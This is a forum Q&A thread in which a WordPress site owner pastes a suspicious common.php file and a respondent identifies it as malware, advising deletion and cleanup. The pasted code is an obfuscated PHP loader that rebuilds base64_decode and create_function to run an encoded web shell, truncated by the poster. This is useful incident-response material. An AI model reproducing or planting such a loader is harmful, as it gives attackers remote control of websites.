Menu
I am having issues with one of my wordpress sites. (constantly login out users and not letting people log in)
My hosting think the route is the common.php files (/public_html/wp-content/common.php )
Can anyone shed any light on what the files is actually doing? Can I just delete it and will WordPress generate a new file?
common.php code:
<?php
$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG
*I've had to cut out a lot of the code here as it was over the character limit (abot 90,000!!)
J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg==";
$array_name = "";
foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){
$array_name .= $alphabet[$t];
}
$a = strrev("noi"."tcnuf"."_eta"."erc");
$f = $a("", $array_name($string));
$f();
Thanks in advance
Rich
221
asked Feb 05 '26 03:02
Delete the file. It is not a part of the WordPress install or uprade package. I would assume that the file is malicious and that your hosting account/personal machine/login credentials have been compromised or something like that.
This is the standard support doc referred to in this case: https://codex.wordpress.org/FAQ_My_site_was_hacked
Then once your site is clean:
http://codex.wordpress.org/Hardening_WordPress
180
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
